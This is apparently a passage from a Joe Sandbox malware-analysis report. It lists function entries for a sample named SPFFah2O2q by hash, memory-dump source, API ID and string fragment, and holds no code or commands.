                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a164414c649293df32a122712d6e0e106fe21d8b546922be5564c9c7b9508f0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E0145346482119FE7109F289989A3BB3E7ABC2304F199438F284A3191D730CC1AC766
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                • Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                • Instruction ID: ed99d62cad2d8a74810f9fcf41a29777fee3f8a32acb6f4349db0e45394f3c90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9111E933A851E05EC32A8D3C8490565BFE30A93174FD94399F4B99B2D2D7238D8F8751
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                                                                                                                                                                                                                                • Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                                                                                                                                                                                                • Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                                                                                                                                                                                                                                                • Instruction ID: 2310f031b25e9bf0509559ae23760092ab28691770f3e69791aae9b064805d0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8D09E72C54244AFD9409F00DC41B6AB3BAFB4A704F441565B988B1161E762EA288B57
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                                                                                                                                                                                • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                                                                                                                                                                                                                                                • Instruction ID: 656f03ea0ba798a0d7369c4efd873f8aa6c4bc019a108f24c413af68ab3025bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AD0127BFC21004B9A499F10DD43BB56A6397C7704B0CE134C905D3748EA3DE41A940E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                                • Instruction ID: 310d4e9ec3f478ee9049038b4584abc09a6d07098bd320122b1c4786a80be0a3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB092A1C82D108B94913F202C018EAB6261D13340F046030CA0626600BA27EA2A689F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                                • Instruction ID: 7c874190e71e0fbb0cda3392969414040c90f325fa5a96b92036f724b8e84a06
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59B012D0C44600C7D8409F205C008B1A23C4607210F003420C108E7101E131E400550D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                                                                                                                                                                                • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                                                                                                                                                                                                                                                • Instruction ID: 5f90c8482877ae364e78efe8602c82ba5110085f469652caa7ae2d3bb2038f17
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC900224D4D1008681508F449440470E279930B111F103410900CF3062C310D545455D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                                                • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                                                • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                • Instruction ID: 9984ae5028406fb0d81c9c50bffc3836b1e52f57bf149ad731b65c15f35c6558
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B81066010CBD28AD326C63C881874FBFD15BE7224F184B9DE1F94B3E2D6A58146C727
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                                                • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                                                • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                • Instruction ID: a4bcf618902c6d2940809fd1c3f37cb63b243fa97388cc7d2922cc7a68f78d26
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B881E72010CBC289D326C63C885875FBFD15BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
• API String ID: 2610073882-1095711290
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: Variant$ClearInit
• String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
• API String ID: 2610073882-1095711290
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
• API String ID: 2610073882-1095711290
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitVariant
• String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
• API String ID: 1927566239-3011065302
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID: InitVariant
• String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
• API String ID: 1927566239-3011065302
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitVariant
• String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
• API String ID: 1927566239-3011065302
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID: InitVariant
• String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
• API String ID: 1927566239-3011065302
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: Variant$ClearInit
• String ID: A$e$e$n$p$p$v$w$z$z
• API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                                • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                                • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                                • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                • Instruction ID: 215e1153fe4924e9fee081b507298f35757b0ff449ecb0259ee533e8b1e7a84e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E41383160C7C18ED331CB38885879BBFD1ABA6324F088AADD4E9872D6D7794509C763
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1006321803-0
                                                                                                                                                                                                                                                                • Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                                • Instruction ID: b6d820a8ec019a0753c70d12075308e159192bba8122e011df5bb995b1a22ede
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 395124F1D086968FD700AB78C4493AEFFE0AB41310F058639E9A587381D3799868CB93
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
